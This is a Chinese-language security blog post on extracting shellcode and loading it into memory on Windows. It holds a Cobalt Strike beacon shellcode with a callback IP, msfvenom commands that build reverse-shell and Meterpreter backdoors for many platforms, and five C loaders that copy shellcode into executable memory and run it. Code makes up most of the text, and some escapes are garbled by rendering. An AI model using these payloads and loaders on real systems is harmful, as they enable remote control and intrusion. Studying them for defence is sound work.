点击蓝字 关注我们
免责声明
本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。
如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。
文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
添加星标不迷路
由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦
1.提取shellcode
1.cs上远控shellcode的提取
首先启动我们的cs
选择payload生成器 设置监听器 生成c语言的格式
/* length: 894 bytes */
unsigned char buf[] = "xfcx48x83xe4xf0xe8xc8x00x00x00x41x51x41x50x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52x20x8bx42x3cx48x01xd0x66x81x78x18x0bx02x75x72x8bx80x88x00x00x00x48x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5ax48x83xecx20x41x52xffxe0x58x41x59x5ax48x8bx12xe9x4fxffxffxffx5dx6ax00x49xbex77x69x6ex69x6ex65x74x00x41x56x49x89xe6x4cx89xf1x41xbax4cx77x26x07xffxd5x48x31xc9x48x31xd2x4dx31xc0x4dx31xc9x41x50x41x50x41xbax3ax56x79xa7xffxd5xebx73x5ax48x89xc1x41xb8x50x00x00x00x4dx31xc9x41x51x41x51x6ax03x41x51x41xbax57x89x9fxc6xffxd5xebx59x5bx48x89xc1x48x31xd2x49x89xd8x4dx31xc9x52x68x00x02x40x84x52x52x41xbaxebx55x2ex3bxffxd5x48x89xc6x48x83xc3x50x6ax0ax5fx48x89xf1x48x89xdax49xc7xc0xffxffxffxffx4dx31xc9x52x52x41xbax2dx06x18x7bxffxd5x85xc0x0fx85x9dx01x00x00x48xffxcfx0fx84x8cx01x00x00xebxd3xe9xe4x01x00x00xe8xa2xffxffxffx2fx4ex55x76x44x00x9bx41x2fx0cx3cx10xfbx29x50x2fxc1xb5x99xa0xbcxf3x7axabxbex23xc7xe9x92xedx8ex5fx57x79x56x33xa1x0fx72xc1xe8x97x5cx15x84x87xfcx01x19x33x0cx26x55x26x8bx81xfdxf0x18x85x8cx7axe6xe3x15x3bx6fx64x96xd3x9ex01x83xcex10xe8x01x86xd6x00x55x73x65x72x2dx41x67x65x6ex74x3ax20x4dx6fx7ax69x6cx6cx61x2fx35x2ex30x20x28x63x6fx6dx70x61x74x69x62x6cx65x3bx20x4dx53x49x45x20x31x30x2ex30x3bx20x57x69x6ex64x6fx77x73x20x4ex54x20x36x2ex32x3bx20x57x69x6ex36x34x3bx20x78x36x34x3bx20x54x72x69x64x65x6ex74x2fx36x2ex30x3bx20x4dx44x44x43x4ax53x29x0dx0ax00xfcx26x07x47x56x82xbcxfcxa8xfbx10x4fx44xe3xfdx8dxd5x2ex2fxc8x17x41x3fx2fx97x40x56x1fxf3x64x85xf5xbbx88x01x20x5bx4dx55xaex87xd3x4ax7cx34x04x11x18xaax39x03xf5xa1x5cx27x82x5fxf6x63x4exb0x70x00xdex20x66xe2x6fx53xfex40xa7x04x0bx99x6ax80x4ax73xb9x3ax24x64x75x0fxfex7fx38x54xc1x95x03x72x6exbaxd8x02x80x11x8dx41x44xecx4cx11x9ex25x72xe7x05xc9x2fxa0xa5xb3xc9xdex6dx43x92x80xe3x89x20x27xd7x87x0dxfcx5dx48xb2xbaxf0x91x5cxe3xa2xd4x4ex3ex16x8axf7xc9x9dx97x00x0fx2cx09x76x4cx3fxa1xdbx83xb9x46x3dxb3xacx70x48xf5xfaxa1xafx9cxe2x2ax0ax15x75xf4x98x8dxa2x7bxa3xa3x77x60xb7x13xf6xc4xfdx36x9dx18x4dxd5x47xcex50xe3x3ex2dxf1x54x5ax81xe5x00x41xbexf0xb5xa2x56xffxd5x48x31xc9xbax00x00x40x00x41xb8x00x10x00x00x41xb9x40x00x00x00x41xbax58xa4x53xe5xffxd5x48x93x53x53x48x89xe7x48x89xf1x48x89xdax41xb8x00x20x00x00x49x89xf9x41xbax12x96x89xe2xffxd5x48x83xc4x20x85xc0x74xb6x66x8bx07x48x01xc3x85xc0x75xd7x58x58x58x48x05x00x00x00x00x50xc3xe8x9fxfdxffxffx31x39x32x2ex31x36x38x2ex32x30x36x2ex31x32x39x00x3axdex68xb1";
这一段c代码就是我们的shellcode
严格的来说shellcode就是一段十六进制的机器码 而这段shellcode如果加载到内存中执行就会让我们获得目标出网主机的权限这是cs这个渗透工具内部实现的功能
2.msf的shellcode提取
msf的shellcode分为好多种 有不同环境和不同主机下的那些和cs的shellcode差不多一个生产思路
常见的msf的shellcode生成方式
MSF 生成各种后门
Windows: 生成Windows后门.
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -o
payload.exe
Linux:
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f elf -o payload.elf
MAC OS: 生成苹果MAC后门.
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f macho -o payload.macho
Android: 生成安卓后门,需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f apk -o payload.apk
PowerShell: 生成PowerShell.
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=
<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >>
shell.php
ASP.net:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
JSP:
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻
击机端口 -f raw -o payload.jsp
War:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -
o payload.war
其中msf还有个功能就是自定义命令生成shellcode
msfvenom -p windows/exec cmd=calc.exe -f c
后面的加载我们为了方便就采用弹出计算器的方式来验证
3.自定义的shellcode提取
(1)自定义C语言代码
这里有一段正常的c语言代码 调用WinExec来执行弹出计算器
我们给他放到ida中看一下汇编
可以看出他是堆栈传参的我们来提取他的shellcode
提取出来后就是一串16进制的代码 但是我们是不能加载到内存中运行 因为这个WinExec函数的地址可不一样
(2):自定义汇编
所以我们可以自定义calc 和1来传参 然后写死WinExec的地址来试一下
首先创造一个calc
xor ecx,ecx
push ecx
//ecx清0后压栈
push 0x636c6163
mov eax,esp
//保留栈顶指针
然后通过IDA查找WinExec的函数地址或者通过GetProcAddress函数
然后利用堆栈传参
xor ecx,ecx
push ecx
//ecx清0后压栈
push 0x636c6163
mov eax,esp
//保留栈顶指针
mov ecx,1
push ecx
push eax
push ebx,xxxx;WinExec的地址
call ebx
然后用kali编译asm文件
nasm -f elf32 -o xxx.o xxx.asm
ld -m elf_i386 -o xxx xxx.o
用objdump提取shellcode就可以了
shellcodeLoader
简而言之就是把一个shellcode加载到内存中但是有不同的加载方式这里就用弹出一个计算器的方式来演示效果
配置好vs
32位内敛汇编加载
通过32位汇编的内联汇编来加载shellcode,不能用64位因为不支持内联汇编
#include<Windows.h>
#pragma comment(linker, "/section:.data,RWE") //将.data段设置为可读可写可执行
unsigned char buf[] =
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50"
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26"
"x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7"
"xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78"
"xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3"
"x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01"
"xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58"
"x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3"
"x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a"
"x51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8d"
"x85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbb"
"xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7c"
"x0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53"
"xffxd5x63x61x6cx63x2ex65x78x65x00";
void main() {
__asm {
lea eax,buf
call eax
}
}
函数指针加载
(void(<em>)(void)) 是一个函数指针类型的强制转换 它指向一个返回类型为void而且没有参数的函数 (void(</em>)(void))&buf 将buf的地址转换为一个函数指针 然后自己调用自己
((void(*)(void))&buf)();就达到了可以加载shellcode的目的 这个方式和上一个内敛的方式原理一样 但是不同的是 它也可以加载64位的shellcode
#include<Windows.h>
unsigned char buf[] =
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50"
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26"
"x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7"
"xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78"
"xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3"
"x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01"
"xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58"
"x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3"
"x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a"
"x51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8d"
"x85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbb"
"xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7c"
"x0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53"
"xffxd5x63x61x6cx63x2ex65x78x65x00";
void main() {
((void(*)(void)) & buf)();
}
创建线程加载
就是通过申请可读可写的内存 然后把buf数组里面的内容复制到内存里面 然后创建一个新的线程来执行内存里面的内容 然后等待线程执行完毕
#include<Windows.h>
unsigned char buf[] =
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50"
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26"
"x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7"
"xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78"
"xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3"
"x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01"
"xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58"
"x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3"
"x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a"
"x51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8d"
"x85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbb"
"xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7c"
"x0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53"
"xffxd5x63x61x6cx63x2ex65x78x65x00";
void main() {
//内存的起始地址 内存的大小 内存分配属性 页属性内存保护
LPVOID lpAlloc = VirtualAlloc(NULL, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//目的地址 源地址 大小
memcpy(lpAlloc, buf, sizeof buf);
//指向结构体的指针为NULL则不能被继承 堆栈的初始大小为0则是默认大小 表示线程的起始地址 传给现成的变量 控制线程的标志为0则是立即执行 接收线程标识符变量的指针
HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpAlloc, NULL, 0, NULL);
WaitForSingleObject(hThread, INFINITE);
}
创建堆加载
创建一个具有执行权限的堆 在堆中分配内存将shellcode复制进去 然后直接调用储存在内存中的shellcode
#include<Windows.h>
unsigned char buf[] =
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50"
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26"
"x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7"
"xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78"
"xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3"
"x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01"
"xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58"
"x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3"
"x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a"
"x51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8d"
"x85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbb"
"xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7c"
"x0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53"
"xffxd5x63x61x6cx63x2ex65x78x65x00";
void main() {
//堆的分配选项可以执行 堆的初始大小 堆的最大大小
HANDLE heap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, sizeof buf, 0);
//句柄 分配的属性 大小
char* buffer = (char*)HeapAlloc(heap,HEAP_ZERO_MEMORY,sizeof buf);
memcpy(buffer, buf, sizeof buf);
((void(*)(void)) buffer)();//这里也可以换成线程加载
}
资源加载
vs支持直接导入资源文件来导入数据
这里使用 msf生成的bin文件
msfvenom -p windows/exec cmd=calc.exe -f raw -o payload.bin
然后添加导入资源文件
这里会生成一个.h文件让我们主程序去包含他就可以了
#include<Windows.h>
#include "resource.h"
unsigned char buf[] =
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50"
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26"
"x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7"
"xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78"
"xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3"
"x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01"
"xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58"
"x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3"
"x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a"
"x51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8d"
"x85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbb"
"xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7c"
"x0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53"
"xffxd5x63x61x6cx63x2ex65x78x65x00";
void main() {
//指向资源的句柄为NULL就在当前进程中寻找 指向资源名称的指针 指向资源类型的指针
HRSRC res = FindResourceA(NULL, MAKEINTRESOURCEA(IDR_SHELLCODE1), "shellcode");
DWORD size = SizeofResource(NULL, res);//得出资源的大小
HGLOBAL load = LoadResource(NULL, res);//将资源加载的内存中 获取资源的句柄
void* buffer = VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(buffer, load, size);
((void(*)(void)) buffer)();
}
原文始发于微信公众号(SecHub网络安全社区):shellcodeLoder的常见方式(上)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论